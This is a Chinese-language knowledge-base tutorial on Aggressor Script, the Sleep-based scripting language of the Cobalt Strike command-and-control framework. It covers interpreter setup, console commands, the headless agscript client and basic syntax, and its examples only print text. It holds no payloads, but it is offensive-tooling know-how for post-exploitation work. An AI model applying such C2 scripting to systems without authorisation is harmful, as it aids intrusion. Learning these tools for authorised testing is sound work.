<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>Aggressor-Script | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/64.6bf3fede.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>工具手册</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/tools/nmap.html" title="nmap端口扫描" class="sidebar-link">nmap端口扫描</a></li><li><a href="/knowledge/tools/sqlmap.html" title="sqlmap简要手册" class="sidebar-link">sqlmap简要手册</a></li><li><a href="/knowledge/tools/metasploit.html" title="Metasploit漏洞利用框架" class="sidebar-link">Metasploit漏洞利用框架</a></li><li><a href="/knowledge/tools/burpsuite.html" title="BurpSuite简要手册" class="sidebar-link">BurpSuite简要手册</a></li><li><a href="/knowledge/intranet/Cobalt-Strike.html" title="Cobalt Strike" class="sidebar-link">Cobalt Strike</a></li><li><a href="/knowledge/intranet/Aggressor-script.html" aria-current="page" title="Aggressor-Script" class="active sidebar-link">Aggressor-Script</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Web安全</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="sleep环境的搭建">Sleep环境的搭建 <a href="#sleep环境的搭建" class="header-anchor">#</a></h1> <blockquote><p>C2：Cobalt Strike，一款多人运动工具，常常使用再后渗透阶段</p></blockquote> <blockquote><p>Aggressor Script：是C2 3.0以上版本的一个内置的脚本语言，他是由Sleep脚本解析，Sleep脚本目前国内是没有中文版本的，可能是因为使用的人不多，在在后面我会去把这个语言进行翻译；在CS 3.0 以上的版本，菜单、选项、事件、都有默认的default.cna构建。我们可以使用一些IRC、Webhook去对接机器人和监控，比如瞎子哥的Server上线监听，以及梼杌等插件的编写，所以本文也会在他们的代码基础上去解释一些东西</p></blockquote> <p>由于 Aggressor Script是由Sleep解析的，所以我们先要安装一下这个语言的解释器，这个语言是基于Java的脚本语言</p> <p>Sleep语言下载地址：http://sleep.dashnine.org/download/sleep.jar</p> <ul><li><p>快速使用：
<code>java -jar sleep.jar</code>:
<img src="/images/Aggressor-Script/image-20201212181400822.png" alt="image-20201212181400822"></p></li> <li><p>输出 hello word：</p> <p>新建一个 cna 文件，cna是Aggressor Scrip脚本的后缀，然后在里面写：</p> <div class="language-java line-numbers-mode"><pre class="language-java"><code><span class="token function">println</span><span class="token punctuation">(</span><span class="token string">&quot;hello word&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>然后加载一下：
<img src="/images/Aggressor-Script/image-20201212181921731.png" alt="image-20201212181921731"></p> <p>运行出第一个程序</p></li></ul> <h1 id="简介">简介 <a href="#简介" class="header-anchor">#</a></h1> <p>在 C2 中，我们可以打开 Aggressor Script的控制台</p> <p><img src="/images/Aggressor-Script/image-20201212182434257.png" alt="image-20201212182434257"></p> <p>这里我们可以使用 help查看一些帮助信息：
<img src="/images/Aggressor-Script/image-20201212182524164.png" alt="image-20201212182524164"></p> <p>下面是介绍：</p> <ul><li><p>?
进行一个简单的判断，返回值为True或者False，例如<code>? int(1) == int(2)</code>返回为False：</p> <p><img src="/images/Aggressor-Script/image-20201212200112970.png" alt="image-20201212200112970"></p></li> <li><p>e
执行我们写的代码，相当于交互模式，如果不加上 <code>e</code> 的话是无法执行的，例如 <code>e println(&quot;hello woed&quot;)</code>:
<img src="/images/Aggressor-Script/image-20201212200347928.png" alt="image-20201212200347928"></p></li> <li><p>help</p> <p>这个就是现实帮助信息，我们在开头使用过：</p> <p><img src="/images/Aggressor-Script/image-20201212200445136.png" alt="image-20201212200445136"></p></li> <li><p>load
加载 cna 脚本，这里我加载一个脚本：
<code>load &lt;cna path&gt;</code>:
<img src="/images/Aggressor-Script/image-20201212200656273.png" alt="image-20201212200656273"></p> <p>这里加载的 cna 内容为：</p> <p><img src="/images/Aggressor-Script/image-20201212200723162.png" alt="image-20201212200723162"></p> <p>意思是创建一个 command  名字为 w，当输入w的时候就打印hello word。</p></li> <li><p>ls
现实我们目前加载的 cna 代码：</p> <p><img src="/images/Aggressor-Script/image-20201212200842985.png" alt="image-20201212200842985"></p></li> <li><p>proff ：静止 cna 脚本运行Sleep的语法（不明白具体的作用）</p></li> <li><p>profile：统计 cna 脚本使用了哪些 Sleep的语法：
<img src="/images/Aggressor-Script/image-20201212204315502.png" alt="image-20201212204315502"></p></li> <li><p>pron 机翻：运行 cna 脚本运行Sleep的语法</p></li> <li><p>reload：重新加载 cna脚本，还是用我们刚刚的脚本举例：
我先修改 cna 中的内容：
<img src="/images/Aggressor-Script/image-20201212204558822.png" alt="image-20201212204558822"></p> <p>在到 控制台输入一下：</p> <p><img src="/images/Aggressor-Script/image-20201212204630060.png" alt="image-20201212204630060"></p> <p>没有改变，我们重载一下在运行：
<img src="/images/Aggressor-Script/image-20201212204717719.png" alt="image-20201212204717719"></p></li> <li><p>troff： 关闭函数跟踪，也就是我们不显示函数运行的具体情况：
<img src="/images/Aggressor-Script/image-20201212205115530.png" alt="image-20201212205115530"></p></li> <li><p>tron:   开启函数跟踪，显示我们运行时的具体情况：
<img src="/images/Aggressor-Script/image-20201212205157768.png" alt="image-20201212205157768"></p> <p>发现我们运行的情况，在1.cna的第三行，我们输出 hello my friend</p></li> <li><p>x：执行一个计算，比如1+1什么的，这里需要注意，两个数字之间需要间隔开，不然会报错：</p> <p><img src="/images/Aggressor-Script/image-20201212205540853.png" alt="image-20201212205540853"></p></li></ul> <h2 id="使用不带gui的c2">使用不带GUI的C2 <a href="#使用不带gui的c2" class="header-anchor">#</a></h2> <p>我们可以使用 <strong>agscript</strong> 运行一个不使用 GUI 的C2客户端，简单的来说就是命令行的操作：</p> <p>服务器上启动后，在本地输入：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>./agscript <span class="token punctuation">[</span>host<span class="token punctuation">]</span> <span class="token punctuation">[</span>port<span class="token punctuation">]</span> <span class="token punctuation">[</span>user<span class="token punctuation">]</span> <span class="token punctuation">[</span>password<span class="token punctuation">]</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201212210453219.png" alt="image-20201212210453219"></p> <p>只会给我们一个建议的 Aggressor的控制台，我们可以在后面跟上 cna 的配置文件，在瞎子哥的Server上线中使用过这个东西：
<img src="/images/Aggressor-Script/image-20201212210803564.png" alt="image-20201212210803564"></p> <p>他使用这样的方式呢可以做到在云端加载 cna 不错过推送，如果在本地加载的话就是只能打开客户端的时候才会接收到推送</p> <p>使用这样的方式会在链接的时候优先执行我们的cna代码，我们在服务端的写下这么一个 cna ：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>on ready {
	println(&quot;多人运行已经准备好了！准备起飞！！！！&quot;); # 登录显示信息
}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>然后运行，显示了我们的信息：
<img src="/images/Aggressor-Script/image-20201212212726236.png" alt="image-20201212212726236"></p> <h2 id="sleep快速入门">Sleep快速入门 <a href="#sleep快速入门" class="header-anchor">#</a></h2> <blockquote><p>因为我是直接翻译的官方文档，所以我顺便也把这里翻译一下</p></blockquote> <ul><li>数字</li> <li>字符串</li> <li>Arrays</li> <li>Lists</li> <li>Stacks</li> <li>Sets</li> <li>Hashs</li></ul> <p>这是他的数据类型，首先我们要注意的是，他的格式是一定需要带上空格的。</p> <div class="language-java line-numbers-mode"><pre class="language-java"><code>$name <span class="token operator">=</span> <span class="token string">&quot;kris&quot;</span><span class="token punctuation">;</span> # 字符串变量的命名
$age <span class="token operator">=</span> <span class="token number">18</span><span class="token punctuation">;</span> # 数字型变量命名

<span class="token class-name">Arrays</span>类型：
<span class="token annotation punctuation">@user_list</span> <span class="token operator">=</span> @<span class="token punctuation">(</span><span class="token string">&quot;kris&quot;</span><span class="token punctuation">,</span><span class="token number">18</span><span class="token punctuation">,</span><span class="token string">&quot;四川&quot;</span><span class="token punctuation">,</span><span class="token string">&quot;单身&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> # <span class="token class-name">Sleep</span>的阵列（列表）是类似python的那种任何元素的集合，不需要元素的类型统一
										也即是一种复合数据类型。
<span class="token function">println</span><span class="token punctuation">(</span><span class="token annotation punctuation">@name_list</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span> # 下标输出信息
 
<span class="token class-name">Hashs</span>类型
<span class="token operator">%</span>dict<span class="token punctuation">[</span><span class="token string">&quot;name&quot;</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token string">&quot;kris&quot;</span><span class="token punctuation">;</span>
<span class="token operator">%</span>dict<span class="token punctuation">[</span><span class="token string">&quot;age&quot;</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token number">18</span><span class="token punctuation">;</span>
<span class="token operator">%</span>dict<span class="token punctuation">[</span><span class="token string">&quot;address&quot;</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token string">&quot;sichuan&quot;</span><span class="token punctuation">;</span> # 使用<span class="token operator">%</span>号创建，有点和python的字典类似
    
<span class="token function">println</span><span class="token punctuation">(</span><span class="token string">&quot;Dict is &quot;</span><span class="token punctuation">.</span>%dict<span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br></div></div><h3 id="arrays">Arrays <a href="#arrays" class="header-anchor">#</a></h3> <p><img src="/images/Aggressor-Script/image-20201213142244276.png" alt="image-20201213142244276"></p> <p><img src="/images/Aggressor-Script/image-20201213142254825.png" alt="image-20201213142254825"></p> <p>这样可以对列表中的元素进行输出。格式话输出的语法是使用 <code>.</code> 进行拼接。</p> <h3 id="hashs">Hashs <a href="#hashs" class="header-anchor">#</a></h3> <p><img src="/images/Aggressor-Script/image-20201213143803659.png" alt="image-20201213143803659"></p> <p><img src="/images/Aggressor-Script/image-20201213143841540.png" alt="image-20201213143841540"></p> <h3 id="遍历">遍历 <a href="#遍历" class="header-anchor">#</a></h3> <p>语法：</p> <div class="language-java line-numbers-mode"><pre class="language-java"><code><span class="token annotation punctuation">@name_list</span> <span class="token operator">=</span> @<span class="token punctuation">(</span><span class="token string">'kris'</span><span class="token punctuation">,</span><span class="token number">18</span><span class="token punctuation">,</span><span class="token string">'sichuan'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
foreach $<span class="token keyword">var</span> <span class="token punctuation">(</span><span class="token annotation punctuation">@name_list</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
   <span class="token function">println</span><span class="token punctuation">(</span>$<span class="token keyword">var</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201213144333561.png" alt="image-20201213144333561"></p> <h3 id="push">Push <a href="#push" class="header-anchor">#</a></h3> <p>这个类似我们的python中的append方法，在列表的最后面添加数据：</p> <div class="language-java line-numbers-mode"><pre class="language-java"><code><span class="token annotation punctuation">@names</span> <span class="token operator">=</span> @<span class="token punctuation">(</span><span class="token string">&quot;Hellen&quot;</span><span class="token punctuation">,</span><span class="token string">&quot;Abao&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">push</span><span class="token punctuation">(</span><span class="token annotation punctuation">@names</span><span class="token punctuation">,</span><span class="token string">&quot;kris&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>


<span class="token function">print</span><span class="token punctuation">(</span><span class="token string">&quot;name :&quot;</span><span class="token punctuation">.</span>@names<span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201213145224932.png" alt="image-20201213145224932"></p> <h2 id="简单的交互程序">简单的交互程序 <a href="#简单的交互程序" class="header-anchor">#</a></h2> <p>首先先看代码：</p> <div class="language-java line-numbers-mode"><pre class="language-java"><code>sub say_hello<span class="token punctuation">{</span>
	<span class="token function">println</span><span class="token punctuation">(</span><span class="token string">&quot;hello &quot;</span><span class="token punctuation">.</span>$<span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span># 定义一个函数，打印hello <span class="token operator">+</span> 得到的参数
<span class="token punctuation">}</span>

command <span class="token class-name">N</span> <span class="token punctuation">{</span>
	<span class="token function">say_hello</span><span class="token punctuation">(</span>$<span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span> # 定义一个命令，并且将接受到的第一个参数传递给 say_hello函数。
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>运行结果：</p> <p><img src="/images/Aggressor-Script/image-20201213150323291.png" alt="image-20201213150323291"></p> <p>使用定义的 N 命令，在他的后面传递第一个名字，就会输出 hello + 你输入的名字，我们定义 N 命令的内容将数据传输带 SAY_hello，所以就输出了 hello + 我们的名字</p> <ul><li><p>sub 定义函数
首先介绍定义函数的方式，在Sleep中，我们使用 sub 进行函数的定义，比如我们定义一个加法函数：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>sub add {
	return $1.&quot;+&quot;.$2.&quot;=&quot;.($1 + $2);
}

$sum = add(1,2);
println($sum);
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201213151226880.png" alt="image-20201213151226880"></p> <p>这里发现，没有和我们预期的一样输出 1+2=3，这是为什么呢？我们在前面说过，Sleep是由比较严格的空格要求，在 <code>($1+$2)</code>这个地方，我们没有正确的使用空格，所以报错，我们只要将他们的格式拿出来就好：
<img src="/images/Aggressor-Script/image-20201213151516075.png" alt="image-20201213151516075"></p> <p>这样就编辑出了一个函数</p></li> <li><p>command定义命令
语法：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">command</span> <span class="token operator">&lt;</span>你想要的命令<span class="token operator">&gt;</span>
	<span class="token punctuation">{</span>
		执行的代码<span class="token punctuation">;</span>
	<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>这里是我们使用我们自定义的函数进行交互的，在上面我们是使用的 N 去执行 say_hello的函数体，我们现在只使用一个  command 起到相同的作用：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">command</span> N <span class="token punctuation">{</span>
	println<span class="token punctuation">(</span><span class="token string">&quot;hello &quot;</span><span class="token builtin class-name">.</span><span class="token variable">$1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
